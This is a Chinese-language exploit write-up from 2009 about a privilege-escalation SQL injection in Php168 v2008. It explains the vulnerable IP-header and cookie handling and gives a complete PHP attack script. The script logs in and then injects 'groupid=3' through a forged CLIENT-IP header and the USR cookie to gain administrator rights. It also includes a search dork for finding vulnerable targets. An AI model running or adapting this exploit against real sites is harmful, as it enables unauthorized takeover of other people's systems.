简单分析下这个 Php168 v2008 权限提升漏洞利用工具代码exploit：

common.inc.php

if($_SERVER['HTTP_CLIENT_IP']){
     $onlineip=$_SERVER['HTTP_CLIENT_IP'];
}elseif($_SERVER['HTTP_X_FORWARDED_FOR']){
     $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
     $onlineip=$_SERVER['REMOTE_ADDR'];
}
$onlineip = preg_replace("/^([d.]+).*/", "\1", filtrate($onlineip));
//这个地方使用preg_replace存在着安全隐患,之前就暴过漏洞,官方修补的方法是用filtrate函数处理了下$onlineip
看一下filtrate函数是怎么处理的

function.inc.php

function filtrate($msg){
    $msg = str_replace('&','&',$msg);
    $msg = str_replace(' ',' ',$msg);
    $msg = str_replace('"','"',$msg);
    $msg = str_replace("'",''',$msg);
    $msg = str_replace("<","&lt;",$msg);
    $msg = str_replace(">","&gt;",$msg);
    $msg = str_replace(" ","   &nbsp;  &nbsp;",$msg);
    $msg = str_replace(" ","",$msg);
    $msg = str_replace("   "," &nbsp; ",$msg);
    return $msg;
}

过滤了'"<等,但是没有处理

common.inc.php

    if($usr_oltime>30||!$usr_oltime){
        $usr_oltime>600 && $usr_oltime=600;
        include(PHP168_PATH."php168/level.php");
        if( isset($memberlevel[$lfjdb[groupid]]) ){
            $SQL=",groupid=8";
            $lfjdb[money]=get_money($lfjuid);
            foreach( $memberlevel AS $key=>$value){
                if($lfjdb[money]>=$value){
                    $SQL=",groupid=$key";
                }
            }
        }else{
            $SQL="";
        }
        $db->query("UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='$onlineip',oltime=oltime+'$usr_oltime'$SQL WHERE uid='$lfjuid'");
//因为这个地方是拼接字符串的形式,所以可以使用来转义',然后利用$usr_oltime来注射:)另外要注意的是$usr_oltime有一个简单的判断的,而且还要保证sql语句的语法正确,看下我构造的语句:

UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='[]',oltime=oltime+'[+31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#]'$SQL WHERE uid='$lfjuid'

最后给出 Php168 v2008 权限提升漏洞利用工具代码exploit：

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Php168 <= v2008 update user access exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user pass
host:      target server (ip/hostname)
path:      path to php168
user:      login username
pass:      login password
Example:
php '.$argv[0].' localhost /php168/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];

$resp = send();
preg_match('/Set-Cookie:s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);

if ($cookie)
    if (strpos(send(), 'puret_t') !== false)
        exit("Expoilt Success! You Are Admin Now! ");
    else
        exit("Exploit Failed! ");
else
    exit("Exploit Failed! ");

function rands($length = 8)
{
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    mt_srand((double)microtime() * 1000000);
    for ($i = 0; $i < $length; $i++)
        $hash .= $chars[mt_rand(0, $max)];

    return $hash;
}

function send()
{
    global $host, $path, $user, $pass, $cookie;

    if ($cookie) {
        $cookie[1] .= ';USR='.rands()." %2b31,groupid=3,introduce=0x70757265745f74 WHERE uid=$cookie[2]# ";
        $cmd = '';

        $message = "POST ".$path."member/userinfo.php  HTTP/1.1 ";
        $message .= "Accept: */* ";
        $message .= "Accept-Language: zh-cn ";
        $message .= "Content-Type: application/x-www-form-urlencoded ";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1) ";
        $message .= "CLIENT-IP: ryat\ ";
        $message .= "Host: $host ";
        $message .= "Content-Length: ".strlen($cmd)." ";
        $message .= "Connection: Close ";
        $message .= "Cookie: ".$cookie[1]." ";
        $message .= $cmd;
    } else {
        $cmd = "username=$user&password=$pass&step=2";

        $message = "POST ".$path."login.php  HTTP/1.1 ";
        $message .= "Accept: */* ";
        $message .= "Accept-Language: zh-cn ";
        $message .= "Content-Type: application/x-www-form-urlencoded ";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1) ";
        $message .= "Host: $host ";
        $message .= "Content-Length: ".strlen($cmd)." ";
        $message .= "Connection: Close ";
        $message .= $cmd;
    }

    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}
?>

by Ryat
http://www.wolvez.org
2009-01-25